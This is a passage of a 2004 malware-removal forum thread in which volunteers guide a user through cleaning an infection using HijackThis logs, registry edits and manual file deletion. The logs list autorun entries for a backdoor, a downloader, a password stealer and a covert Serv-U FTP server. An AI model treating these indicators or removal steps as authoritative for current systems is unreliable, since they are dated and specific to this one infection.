C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\System32\expl0rer.exe
C:\Program Files\The Cleaner\tca.exe
C:\Program Files\The Cleaner\tcm.exe
C:\PROGRA~1\Grisoft\AVG6\avgcc32.exe
C:\WINDOWS\System32\ms32cfg.exe
C:\Program Files\Common Files\Real\Update_OB\rnathchk.exe
C:\Program Files\Web_Rebates\WebRebates1.exe
c:\Program Files\Microsoft Money\System\urlmap.exe
C:\Documents and Settings\Owner\Desktop\MAPEK\HijackThis.exe

R3 - URLSearchHook: (no name) - _{707E6F76-9FFB-4920-A976-EA101271BC25} - (no file)
O2 - BHO: (no name) - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 5.0\Reader\ActiveX\AcroIEHelper.ocx
O2 - BHO: Yahoo! Companion BHO - {13F537F0-AF09-11d6-9029-0002B31F9E59} - C:\Program Files\Yahoo!\Common\ycomp5,0,8,0.dll
O2 - BHO: (no name) - {6F8D170C-B030-7EB3-D554-625509A6261D} - C:\WINDOWS\System32\opivqr.dll
O2 - BHO: (no name) - {FDD3B846-8D59-4ffb-8758-209B6AD74ACC} - c:\Program Files\Microsoft Money\System\mnyviewer.dll
O3 - Toolbar: &Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\System32\msdxm.ocx
O3 - Toolbar: Yahoo! Companion - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - C:\Program Files\Yahoo!\Common\ycomp5,0,8,0.dll
O3 - Toolbar: (no name) - {BDF6CE3D-F5C5-4462-9814-3C8EAC330CA8} - (no file)
O4 - HKLM\..\Run: [hpsysdrv] c:\windows\system\hpsysdrv.exe
O4 - HKLM\..\Run: [HotKeysCmds] C:\WINDOWS\System32\hkcmd.exe
O4 - HKLM\..\Run: [KBD] C:\HP\KBD\KBD.EXE
O4 - HKLM\..\Run: [StorageGuard] "C:\Program Files\VERITAS Software\Update Manager\sgtray.exe" /r
O4 - HKLM\..\Run: [TkBellExe] C:\Program Files\Common Files\Real\Update_OB\realsched.exe -osboot
O4 - HKLM\..\Run: [MoneyStartUp10.0] "c:\Program Files\Microsoft Money\System\Activation.exe"
O4 - HKLM\..\Run: [WCOLOREAL] "C:\Program Files\COMPAQ\Coloreal\coloreal.exe"
O4 - HKLM\..\Run: [Recguard] C:\WINDOWS\SMINST\RECGUARD.EXE
O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE NvQTwk,NvCplDaemon initialize
O4 - HKLM\..\Run: [nwiz] nwiz.exe /installquiet /keeploaded
O4 - HKLM\..\Run: [msn] msnmsgr.exe
O4 - HKLM\..\Run: [Microszoft Update Machinezs] mscnsz.exe
O4 - HKLM\..\Run: [Cryptographic Service] C:\WINDOWS\System32\rnmcy.exe
O4 - HKLM\..\Run: [Windows Media Player Update] wljnvhr.exe
O4 - HKLM\..\Run: [Micro Update] dailin.exe
O4 - HKLM\..\Run: [PS2] C:\WINDOWS\system32\ps2.exe
O4 - HKLM\..\Run: [Microsoft Updates] msupdate.exe
O4 - HKLM\..\Run: [jycfnq] C:\WINDOWS\System32\lijltbn.exe
O4 - HKLM\..\Run: [2D281386] C:\WINDOWS\System32\pretjpaduunb.exe
O4 - HKLM\..\Run: [System Update] C:\WINDOWS\System32\kgpsg.exe
O4 - HKLM\..\Run: [Microsoft Features] ms32cfg.exe
O4 - HKLM\..\Run: [LOLss] wssdsfgsd.exe
O4 - HKLM\..\Run: [Microsoft IT Update] msupdate.exe
O4 - HKLM\..\Run: [WebRebates0] "C:\Program Files\Web_Rebates\WebRebates0.exe"
O4 - HKLM\..\Run: [mswkork Service] msework.exe
O4 - HKLM\..\Run: [Microsoft Update] msnetcfgs.exe
O4 - HKLM\..\Run: [RunDLL] rundll32.exe "C:\WINDOWS\Downloaded Program Files\bridge.dll",Load
O4 - HKLM\..\Run: [Microsoft Update Machine] expl0rer.exe
O4 - HKLM\..\Run: [tcactive] C:\Program Files\The Cleaner\tca.exe
O4 - HKLM\..\Run: [tcmonitor] C:\Program Files\The Cleaner\tcm.exe
O4 - HKLM\..\Run: [AVG_CC] C:\PROGRA~1\Grisoft\AVG6\avgcc32.exe /STARTUP
O4 - HKLM\..\RunServices: [LOLss] wssdsfgsd.exe
O4 - HKLM\..\RunServices: [msn] msnmsgr.exe
O4 - HKLM\..\RunServices: [Microszoft Update Machinezs] mscnsz.exe
O4 - HKLM\..\RunServices: [Windows Media Player Update] wljnvhr.exe
O4 - HKLM\..\RunServices: [Micro Update] dailin.exe
O4 - HKLM\..\RunServices: [Microsoft Updates] msupdate.exe
O4 - HKLM\..\RunServices: [23A7353C] C:\WINDOWS\System32\pretjpaduunb.exe
O4 - HKLM\..\RunServices: [Microsoft Features] ms32cfg.exe
O4 - HKLM\..\RunServices: [Microsoft IT Update] msupdate.exe
O4 - HKLM\..\RunServices: [mswkork Service] msework.exe
O4 - HKLM\..\RunServices: [Microsoft Update] msnetcfgs.exe
O4 - HKLM\..\RunServices: [Microsoft Update Machine] expl0rer.exe
O4 - HKCU\..\Run: [msn] msnmsgr.exe
O4 - HKCU\..\Run: [NVIEW] rundll32.exe nview.dll,nViewLoadHook
O4 - HKCU\..\Run: [LOLss] wssdsfgsd.exe
O4 - HKCU\..\Run: [Microsoft Features] ms32cfg.exe
O4 - HKCU\..\Run: [mswkork Service] msework.exe
O4 - HKCU\..\Run: [Microsoft Update] msnetcfgs.exe
O4 - HKCU\..\Run: [Microsoft Update Machine] expl0rer.exe
O4 - HKCU\..\RunServices: [Microsoft Updates] msupdate.exe
O4 - HKCU\..\RunServices: [Windows Media Player Update] wljnvhr.exe
O4 - Global Startup: Adobe Gamma Loader.exe.lnk = C:\Program Files\Common Files\Adobe\Calibration\Adobe Gamma Loader.exe
O4 - Global Startup: HPAiODevice(hp psc 700 series) - 1.lnk = C:\Program Files\Hewlett-Packard\AiO\hp psc 700 series\Bin\hpobrt07.exe
O4 - Global Startup: Quicken Scheduled Updates.lnk = C:\Program Files\Quicken\bagent.exe
O9 - Extra button: Yahoo! Login (HKLM)
O9 - Extra 'Tools' menuitem: Yahoo! Login (HKLM)
O9 - Extra button: Messenger (HKLM)
O9 - Extra 'Tools' menuitem: Yahoo! Messenger (HKLM)
O9 - Extra button: MoneySide (HKLM)
O12 - Plugin for .spop: C:\Program Files\Internet Explorer\Plugins\NPDocBox.dll
O16 - DPF: {74D05D43-3236-11D4-BDCD-00C04F9A3B61} (HouseCall Control) - http://a840.g.akamai...all/xscan53.cab
O16 - DPF: {A17E30C4-A9BA-11D4-8673-60DB54C10000} (YahooYMailTo Class) - http://download.yaho...mail/ymmapi.dll
O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} (Shockwave Flash Object) - http://download.macr...ash/swflash.cab
O16 - DPF: {E0CE16CB-741C-4B24-8D04-A817856E07F4} - http://cabs.media-mo...abs/downzip.cab
  • 0

#7
Smokey
Posted 06 August 2004 - 12:00 PM

Smokey

    Member 1K

  • Retired Staff
  • 1,423 posts
You have one nasty infection. To start off, download Registrar Lite from here:
http://www.resplende...oad/reglite.exe

Put it in its own folder. You may want to keep this program. It is an excellent free, registry editor.

Copy and paste the follow text into the address bar, then hit 'Go':
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\URLSearchHooks

In the pane on the right are the values associated with that key.
We want to remove this one -> {CFBFAE00-17A6-11D0-99CB-00C04FD64497}_
Notice the underscore at the end, all the others with that need to go as well.

Right click on it, and select delete.
If you get a confirmation question, respond OK then close out the program.

Next, Let's go in manually and delete this trouble files. Just stick with it and your troubles will be over soon. Reboot in safe mode (by tapping F8 at startup and select safe mode from the menu). Be sure you're able to view hidden files, and remove the following files in bold:

C:\WINDOWS\System32\opivqr.dll
C:\Program Files\Common Files\Real\Update_OB\realsched.exe
C:\Windows\nwiz.exe
C:\Windows\msnmsgr.exe
C:\Windows\mscnsz.exe
C:\Windows\wljnvhr.exe
C:\Windows\dailin.exe
C:\Windows\msupdate.exe
C:\Windows\ms32cfg.exe
C:\Windows\wssdsfgsd.exe
C:\Windows\msework.exe
C:\Windows\msnetcfgs.exe
C:\Windows\expl0rer.exe
C:\WINDOWS\System32\rnmcy.exe
C:\WINDOWS\System32\lijltbn.exe
C:\WINDOWS\System32\pretjpaduunb.exe
C:\WINDOWS\System32\kgpsg.exe
C:\Program Files\Web_Rebates\ <- Folder Itself
C:\WINDOWS\Downloaded Program Files\bridge.dll

After that, please go offline, close all browsers and any open Windows, making sure that only HijackThis is open. Scan and when it finishes, put an X in the boxes, only next to these following items, then click fix checked.

O2 - BHO: (no name) - {6F8D170C-B030-7EB3-D554-625509A6261D} - C:\WINDOWS\System32\opivqr.dll
O3 - Toolbar: (no name) - {BDF6CE3D-F5C5-4462-9814-3C8EAC330CA8} - (no file)
O4 - HKLM\..\Run: [TkBellExe] C:\Program Files\Common Files\Real\Update_OB\realsched.exe -osboot
O4 - HKLM\..\Run: [MoneyStartUp10.0] "c:\Program Files\Microsoft Money\System\Activation.exe"
O4 - HKLM\..\Run: [nwiz] nwiz.exe /installquiet /keeploaded
O4 - HKLM\..\Run: [msn] msnmsgr.exe
O4 - HKLM\..\Run: [Microszoft Update Machinezs] mscnsz.exe
O4 - HKLM\..\Run: [Cryptographic Service] C:\WINDOWS\System32\rnmcy.exe
O4 - HKLM\..\Run: [Windows Media Player Update] wljnvhr.exe
O4 - HKLM\..\Run: [Micro Update] dailin.exe
O4 - HKLM\..\Run: [PS2] C:\WINDOWS\system32\ps2.exe
O4 - HKLM\..\Run: [Microsoft Updates] msupdate.exe
O4 - HKLM\..\Run: [jycfnq] C:\WINDOWS\System32\lijltbn.exe
O4 - HKLM\..\Run: [2D281386] C:\WINDOWS\System32\pretjpaduunb.exe
O4 - HKLM\..\Run: [System Update] C:\WINDOWS\System32\kgpsg.exe
O4 - HKLM\..\Run: [Microsoft Features] ms32cfg.exe
O4 - HKLM\..\Run: [LOLss] wssdsfgsd.exe
O4 - HKLM\..\Run: [Microsoft IT Update] msupdate.exe
O4 - HKLM\..\Run: [WebRebates0] "C:\Program Files\Web_Rebates\WebRebates0.exe"
O4 - HKLM\..\Run: [mswkork Service] msework.exe
O4 - HKLM\..\Run: [Microsoft Update] msnetcfgs.exe
O4 - HKLM\..\Run: [RunDLL] rundll32.exe "C:\WINDOWS\Downloaded Program Files\bridge.dll",Load
O4 - HKLM\..\Run: [Microsoft Update Machine] expl0rer.exe
O4 - HKLM\..\RunServices: [LOLss] wssdsfgsd.exe
O4 - HKLM\..\RunServices: [msn] msnmsgr.exe
O4 - HKLM\..\RunServices: [Microszoft Update Machinezs] mscnsz.exe
O4 - HKLM\..\RunServices: [Windows Media Player Update] wljnvhr.exe
O4 - HKLM\..\RunServices: [Micro Update] dailin.exe
O4 - HKLM\..\RunServices: [Microsoft Updates] msupdate.exe
O4 - HKLM\..\RunServices: [23A7353C] C:\WINDOWS\System32\pretjpaduunb.exe
O4 - HKLM\..\RunServices: [Microsoft Features] ms32cfg.exe
O4 - HKLM\..\RunServices: [Microsoft IT Update] msupdate.exe
O4 - HKLM\..\RunServices: [mswkork Service] msework.exe
O4 - HKLM\..\RunServices: [Microsoft Update] msnetcfgs.exe
O4 - HKLM\..\RunServices: [Microsoft Update Machine] expl0rer.exe
O4 - HKCU\..\Run: [msn] msnmsgr.exe
O4 - HKCU\..\Run: [LOLss] wssdsfgsd.exe
O4 - HKCU\..\Run: [Microsoft Features] ms32cfg.exe
O4 - HKCU\..\Run: [mswkork Service] msework.exe
O4 - HKCU\..\Run: [Microsoft Update] msnetcfgs.exe
O4 - HKCU\..\Run: [Microsoft Update Machine] expl0rer.exe
O4 - HKCU\..\RunServices: [Microsoft Updates] msupdate.exe
O4 - HKCU\..\RunServices: [Windows Media Player Update] wljnvhr.exe
O16 - DPF: {E0CE16CB-741C-4B24-8D04-A817856E07F4} - http://cabs.media-mo...abs/downzip.cab

Reboot your PC.

I know I must have missed something in there. So, if you would please, rescan with HijackThis and post a fresh log, and let us know how your system's working. <_<
  • 0

#8
tlorott
Posted 08 August 2004 - 04:03 PM

tlorott

    Member

  • Topic Starter
  • Member
  • PipPip
  • 10 posts
I tried to follow all your instructions but could not find any of the files in c:\windows and c:\windows\system32 directory. The view hidden files and folders was turned on. Anyway after everything the Hijack log looked pritty clean (see below). However, after I connected to the internet ms32cfg, expl0rer, and others reappeared within half hour. Tcleaner was active so it announced their return. I attach the new Hijack log.

This was before connecting to internet :D <_<

Logfile of HijackThis v1.97.7
Scan saved at 6:12:22 PM, on 8/7/2004
Platform: Windows XP SP1 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\spoolsv.exe
C:\PROGRA~1\Grisoft\AVG6\avgserv.exe
c:\WINnt\system32\dllcache\runbatch.exe
c:\WINnt\system32\dllcache\userlist.exe
C:\WINDOWS\SYSTEM\winlogon.exe
C:\WINDOWS\System32\svchost.exe
C:\windows\system\hpsysdrv.exe
C:\HP\KBD\KBD.EXE
C:\Program Files\The Cleaner\tca.exe
C:\Program Files\The Cleaner\tcm.exe
C:\PROGRA~1\Grisoft\AVG6\avgcc32.exe
c:\Program Files\Microsoft Money\System\urlmap.exe
C:\Documents and Settings\Owner\Desktop\MAPEK\HijackThis.exe

R3 - URLSearchHook: (no name) - _{707E6F76-9FFB-4920-A976-EA101271BC25} - (no file)
O2 - BHO: (no name) - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 5.0\Reader\ActiveX\AcroIEHelper.ocx
O2 - BHO: Yahoo! Companion BHO - {13F537F0-AF09-11d6-9029-0002B31F9E59} - C:\Program Files\Yahoo!\Common\ycomp5,0,8,0.dll
O2 - BHO: (no name) - {FDD3B846-8D59-4ffb-8758-209B6AD74ACC} - c:\Program Files\Microsoft Money\System\mnyviewer.dll
O3 - Toolbar: &Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\System32\msdxm.ocx
O3 - Toolbar: Yahoo! Companion - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - C:\Program Files\Yahoo!\Common\ycomp5,0,8,0.dll
O4 - HKLM\..\Run: [hpsysdrv] c:\windows\system\hpsysdrv.exe
O4 - HKLM\..\Run: [HotKeysCmds] C:\WINDOWS\System32\hkcmd.exe
O4 - HKLM\..\Run: [KBD] C:\HP\KBD\KBD.EXE
O4 - HKLM\..\Run: [StorageGuard] "C:\Program Files\VERITAS Software\Update Manager\sgtray.exe" /r
O4 - HKLM\..\Run: [WCOLOREAL] "C:\Program Files\COMPAQ\Coloreal\coloreal.exe"
O4 - HKLM\..\Run: [Recguard] C:\WINDOWS\SMINST\RECGUARD.EXE
O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE NvQTwk,NvCplDaemon initialize
O4 - HKLM\..\Run: [tcactive] C:\Program Files\The Cleaner\tca.exe
O4 - HKLM\..\Run: [tcmonitor] C:\Program Files\The Cleaner\tcm.exe
O4 - HKLM\..\Run: [AVG_CC] C:\PROGRA~1\Grisoft\AVG6\avgcc32.exe /STARTUP
O4 - HKCU\..\Run: [NVIEW] rundll32.exe nview.dll,nViewLoadHook
O4 - Global Startup: Adobe Gamma Loader.exe.lnk = C:\Program Files\Common Files\Adobe\Calibration\Adobe Gamma Loader.exe
O4 - Global Startup: HPAiODevice(hp psc 700 series) - 1.lnk = C:\Program Files\Hewlett-Packard\AiO\hp psc 700 series\Bin\hpobrt07.exe
O4 - Global Startup: Quicken Scheduled Updates.lnk = C:\Program Files\Quicken\bagent.exe
O9 - Extra button: Yahoo! Login (HKLM)
O9 - Extra 'Tools' menuitem: Yahoo! Login (HKLM)
O9 - Extra button: Messenger (HKLM)
O9 - Extra 'Tools' menuitem: Yahoo! Messenger (HKLM)
O9 - Extra button: MoneySide (HKLM)
O12 - Plugin for .spop: C:\Program Files\Internet Explorer\Plugins\NPDocBox.dll
O16 - DPF: {74D05D43-3236-11D4-BDCD-00C04F9A3B61} (HouseCall Control) - http://a840.g.akamai...all/xscan53.cab
O16 - DPF: {A17E30C4-A9BA-11D4-8673-60DB54C10000} (YahooYMailTo Class) - http://download.yaho...mail/ymmapi.dll
O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} (Shockwave Flash Object) - http://download.macr...ash/swflash.cab

This is the log after half hour on internet :D

Logfile of HijackThis v1.97.7
Scan saved at 5:54:22 PM, on 8/8/2004
Platform: Windows XP SP1 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\spoolsv.exe
C:\PROGRA~1\Grisoft\AVG6\avgserv.exe
c:\WINnt\system32\dllcache\runbatch.exe
c:\WINnt\system32\dllcache\userlist.exe
C:\WINDOWS\SYSTEM\winlogon.exe
C:\WINDOWS\System32\svchost.exe
C:\windows\system\hpsysdrv.exe
C:\HP\KBD\KBD.EXE
C:\Program Files\The Cleaner\tca.exe
C:\PROGRA~1\Grisoft\AVG6\avgcc32.exe
C:\WINDOWS\System32\ms32cfg.exe
C:\WINDOWS\System32\msework.exe
C:\WINDOWS\System32\msnetcfgs.exe
C:\WINDOWS\System32\expl0rer.exe
C:\WINDOWS\System32\ms32cfg.exe
C:\Documents and Settings\Owner\Desktop\MAPEK\HijackThis.exe

R3 - URLSearchHook: (no name) - _{707E6F76-9FFB-4920-A976-EA101271BC25} - (no file)
O2 - BHO: (no name) - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 5.0\Reader\ActiveX\AcroIEHelper.ocx
O2 - BHO: (no name) - {FDD3B846-8D59-4ffb-8758-209B6AD74ACC} - c:\Program Files\Microsoft Money\System\mnyviewer.dll
O3 - Toolbar: &Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\System32\msdxm.ocx
O4 - HKLM\..\Run: [hpsysdrv] c:\windows\system\hpsysdrv.exe
O4 - HKLM\..\Run: [HotKeysCmds] C:\WINDOWS\System32\hkcmd.exe
O4 - HKLM\..\Run: [KBD] C:\HP\KBD\KBD.EXE
O4 - HKLM\..\Run: [StorageGuard] "C:\Program Files\VERITAS Software\Update Manager\sgtray.exe" /r
O4 - HKLM\..\Run: [WCOLOREAL] "C:\Program Files\COMPAQ\Coloreal\coloreal.exe"
O4 - HKLM\..\Run: [Recguard] C:\WINDOWS\SMINST\RECGUARD.EXE
O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE NvQTwk,NvCplDaemon initialize
O4 - HKLM\..\Run: [tcactive] C:\Program Files\The Cleaner\tca.exe
O4 - HKLM\..\Run: [tcmonitor] C:\Program Files\The Cleaner\tcm.exe
O4 - HKLM\..\Run: [AVG_CC] C:\PROGRA~1\Grisoft\AVG6\avgcc32.exe /STARTUP
O4 - HKLM\..\Run: [Microsoft Features] ms32cfg.exe
O4 - HKLM\..\Run: [mswkork Service] msework.exe
O4 - HKLM\..\Run: [Microsoft Update] msnetcfgs.exe
O4 - HKLM\..\Run: [Microsoft Update Machine] expl0rer.exe
O4 - HKLM\..\RunServices: [mswkork Service] msework.exe
O4 - HKLM\..\RunServices: [Microsoft Update] msnetcfgs.exe
O4 - HKLM\..\RunServices: [Microsoft Update Machine] expl0rer.exe
O4 - HKLM\..\RunServices: [Microsoft Features] ms32cfg.exe
O4 - HKCU\..\Run: [NVIEW] rundll32.exe nview.dll,nViewLoadHook
O4 - HKCU\..\Run: [Microsoft Features] ms32cfg.exe
O4 - HKCU\..\Run: [mswkork Service] msework.exe
O4 - HKCU\..\Run: [Microsoft Update] msnetcfgs.exe
O4 - HKCU\..\Run: [Microsoft Update Machine] expl0rer.exe
O4 - Global Startup: Adobe Gamma Loader.exe.lnk = C:\Program Files\Common Files\Adobe\Calibration\Adobe Gamma Loader.exe
O4 - Global Startup: HPAiODevice(hp psc 700 series) - 1.lnk = C:\Program Files\Hewlett-Packard\AiO\hp psc 700 series\Bin\hpobrt07.exe
O4 - Global Startup: Quicken Scheduled Updates.lnk = C:\Program Files\Quicken\bagent.exe
O9 - Extra button: MoneySide (HKLM)
O12 - Plugin for .spop: C:\Program Files\Internet Explorer\Plugins\NPDocBox.dll
O16 - DPF: {74D05D43-3236-11D4-BDCD-00C04F9A3B61} (HouseCall Control) - http://a840.g.akamai...all/xscan53.cab
O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} (Shockwave Flash Object) - http://download.macr...ash/swflash.cab

:P
  • 0

#9
admin
Posted 08 August 2004 - 11:34 PM

admin

    Founder Geek

  • Community Leader
  • 24,639 posts
Looks like you have some hacker tools installed on your system. Let's start here:

Please run a free online virus scan here:
http://housecall.antivirus.com/

When finished, reboot and post a fresh log, then we can continue cleaning.
  • 0

#10
tlorott
Posted 09 August 2004 - 11:24 AM

tlorott

    Member

  • Topic Starter
  • Member
  • PipPip
  • 10 posts
Housecall found bnothing. during the scan, however, AVG warned about the following viruses and offered their removal:
Downloader.Small.9.X
IRC\Backdoor.SdBot.35.E
PSW.Briss.C

The log looks like this now

Logfile of HijackThis v1.97.7
Scan saved at 1:18:34 PM, on 8/9/2004
Platform: Windows XP SP1 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\spoolsv.exe
C:\PROGRA~1\Grisoft\AVG6\avgserv.exe
c:\WINnt\system32\dllcache\runbatch.exe
c:\WINnt\system32\dllcache\userlist.exe
C:\WINDOWS\SYSTEM\winlogon.exe
C:\WINDOWS\System32\svchost.exe
C:\windows\system\hpsysdrv.exe
C:\HP\KBD\KBD.EXE
C:\Program Files\VERITAS Software\Update Manager\sgtray.exe
C:\Program Files\The Cleaner\tca.exe
C:\Program Files\The Cleaner\tcm.exe
C:\PROGRA~1\Grisoft\AVG6\avgcc32.exe
C:\WINDOWS\System32\ms32cfg.exe
C:\WINDOWS\System32\msework.exe
C:\WINDOWS\System32\msnetcfgs.exe
C:\WINDOWS\System32\expl0rer.exe
C:\WINDOWS\System32\mscnsz.exe
C:\WINDOWS\System32\ms32cfg.exe
c:\Program Files\Microsoft Money\System\urlmap.exe
C:\Documents and Settings\Owner\Desktop\MAPEK\HijackThis.exe

R3 - URLSearchHook: (no name) - _{707E6F76-9FFB-4920-A976-EA101271BC25} - (no file)
O2 - BHO: (no name) - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 5.0\Reader\ActiveX\AcroIEHelper.ocx
O2 - BHO: (no name) - {FDD3B846-8D59-4ffb-8758-209B6AD74ACC} - c:\Program Files\Microsoft Money\System\mnyviewer.dll
O3 - Toolbar: &Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\System32\msdxm.ocx
O4 - HKLM\..\Run: [hpsysdrv] c:\windows\system\hpsysdrv.exe
O4 - HKLM\..\Run: [HotKeysCmds] C:\WINDOWS\System32\hkcmd.exe
O4 - HKLM\..\Run: [KBD] C:\HP\KBD\KBD.EXE
O4 - HKLM\..\Run: [StorageGuard] "C:\Program Files\VERITAS Software\Update Manager\sgtray.exe" /r
O4 - HKLM\..\Run: [WCOLOREAL] "C:\Program Files\COMPAQ\Coloreal\coloreal.exe"
O4 - HKLM\..\Run: [Recguard] C:\WINDOWS\SMINST\RECGUARD.EXE
O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE NvQTwk,NvCplDaemon initialize
O4 - HKLM\..\Run: [tcactive] C:\Program Files\The Cleaner\tca.exe
O4 - HKLM\..\Run: [tcmonitor] C:\Program Files\The Cleaner\tcm.exe
O4 - HKLM\..\Run: [AVG_CC] C:\PROGRA~1\Grisoft\AVG6\avgcc32.exe /STARTUP
O4 - HKLM\..\Run: [Microsoft Features] ms32cfg.exe
O4 - HKLM\..\Run: [mswkork Service] msework.exe
O4 - HKLM\..\Run: [Microsoft Update] msnetcfgs.exe
O4 - HKLM\..\Run: [Microsoft Update Machine] expl0rer.exe
O4 - HKLM\..\Run: [Microszoft Update Machinezs] mscnsz.exe
O4 - HKLM\..\RunServices: [mswkork Service] msework.exe
O4 - HKLM\..\RunServices: [Microsoft Update] msnetcfgs.exe
O4 - HKLM\..\RunServices: [Microsoft Update Machine] expl0rer.exe
O4 - HKLM\..\RunServices: [Microsoft Features] ms32cfg.exe
O4 - HKLM\..\RunServices: [Microszoft Update Machinezs] mscnsz.exe
O4 - HKCU\..\Run: [NVIEW] rundll32.exe nview.dll,nViewLoadHook
O4 - HKCU\..\Run: [Microsoft Features] ms32cfg.exe
O4 - HKCU\..\Run: [mswkork Service] msework.exe
O4 - HKCU\..\Run: [Microsoft Update] msnetcfgs.exe
O4 - HKCU\..\Run: [Microsoft Update Machine] expl0rer.exe
O4 - HKCU\..\Run: [Microszoft Update Machinezs] mscnsz.exe
O4 - Global Startup: Adobe Gamma Loader.exe.lnk = C:\Program Files\Common Files\Adobe\Calibration\Adobe Gamma Loader.exe
O4 - Global Startup: HPAiODevice(hp psc 700 series) - 1.lnk = C:\Program Files\Hewlett-Packard\AiO\hp psc 700 series\Bin\hpobrt07.exe
O4 - Global Startup: Quicken Scheduled Updates.lnk = C:\Program Files\Quicken\bagent.exe
O9 - Extra button: MoneySide (HKLM)
O12 - Plugin for .spop: C:\Program Files\Internet Explorer\Plugins\NPDocBox.dll
O16 - DPF: {74D05D43-3236-11D4-BDCD-00C04F9A3B61} (HouseCall Control) - http://a840.g.akamai...all/xscan53.cab
O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} (Shockwave Flash Object) - http://download.macr...ash/swflash.cab
  • 0

Advertisements

#11
admin
Posted 09 August 2004 - 03:12 PM

admin

    Founder Geek

  • Community Leader
  • 24,639 posts
This seems to be a new variation of an old virus that most anti-virus programs don't detect yet. We'll try and remove it manually.

Please go offline, close all browsers and any open Windows, making sure that only HijackThis is open. Scan and when it finishes, put an X in the boxes, only next to these following items, then click fix checked.
R3 - URLSearchHook: (no name) - _{707E6F76-9FFB-4920-A976-EA101271BC25} - (no file)
O4 - HKLM\..\Run: [Microsoft Features] ms32cfg.exe
O4 - HKLM\..\Run: [mswkork Service] msework.exe
O4 - HKLM\..\Run: [Microsoft Update] msnetcfgs.exe
O4 - HKLM\..\Run: [Microsoft Update Machine] expl0rer.exe
O4 - HKLM\..\Run: [Microszoft Update Machinezs] mscnsz.exe
O4 - HKLM\..\RunServices: [mswkork Service] msework.exe
O4 - HKLM\..\RunServices: [Microsoft Update] msnetcfgs.exe
O4 - HKLM\..\RunServices: [Microsoft Update Machine] expl0rer.exe
O4 - HKLM\..\RunServices: [Microsoft Features] ms32cfg.exe
O4 - HKLM\..\RunServices: [Microszoft Update Machinezs] mscnsz.exe
O4 - HKCU\..\Run: [Microsoft Features] ms32cfg.exe
O4 - HKCU\..\Run: [mswkork Service] msework.exe
O4 - HKCU\..\Run: [Microsoft Update] msnetcfgs.exe
O4 - HKCU\..\Run: [Microsoft Update Machine] expl0rer.exe
O4 - HKCU\..\Run: [Microszoft Update Machinezs] mscnsz.exe

Reboot in safe mode (by tapping F8 at startup and select safe mode from the menu).
Be sure you're able to view hidden files, and remove the following files in bold (if found):
c:\WINnt\system32\dllcache\runbatch.exe
c:\WINnt\system32\dllcache\userlist.exe
C:\WINDOWS\System32\ms32cfg.exe
C:\WINDOWS\System32\msework.exe
C:\WINDOWS\System32\msnetcfgs.exe
C:\WINDOWS\System32\expl0rer.exe
C:\WINDOWS\System32\mscnsz.exe

Reboot your PC.

If you would please, rescan with HijackThis and post a fresh log, and let us know how your system's working. <_<
  • 0

#12
tlorott
Posted 10 August 2004 - 07:39 AM

tlorott

    Member

  • Topic Starter
  • Member
  • PipPip
  • 10 posts
Of the files you indicated only the two dll's in the WINNT could be found the others in windows\system32 were not there.
after fixing, the log looked clean again (see below)
after couple of hours on the internet some of them came back (see below). There were a couple of messages during this time from "Messenger Service" quoting some microsoft document and trying to send me to www.patchwindows.org and to www.win-fix.com. There was only one choice "OK" or close the popup with the little x on the upper right corner, which I did.
since then the internet is not working. most of the time "cannot find server" but I am not sure if this is related.

I looked in the WINNT\dllcache and found the following new files (dated 8/9/04)
svchost.dll
spoolvc.dll
msvc.state
msvc.state~
ServUStartuplog.txt
ServUDaemon.ini
winmgnt.dll
winmgnt.dll~
Also with a 8/5/04 date:
nt.bat
saw.dws
does any of these look suspicious? Especially those ServU...

ServUStartuplog.txt for example looks like this:

Mon 09Aug04 20:49:12 - Serv-U FTP Server v5.0 (5.0.0.0) - Copyright © 1995-2004 Cat Soft, All Rights Reserved - by Rob Beckers
Mon 09Aug04 20:49:12 - Cat Soft is an affiliate of Rhino Software, Inc.
Mon 09Aug04 20:49:12 - Using WinSock 2.0 - max. 32767 sockets
Mon 09Aug04 20:49:13 - PROBLEM: Unable to load the SSL/TLS libraries (SSLEAY32.DLL and LIBEAY32.DLL) - No SSL support
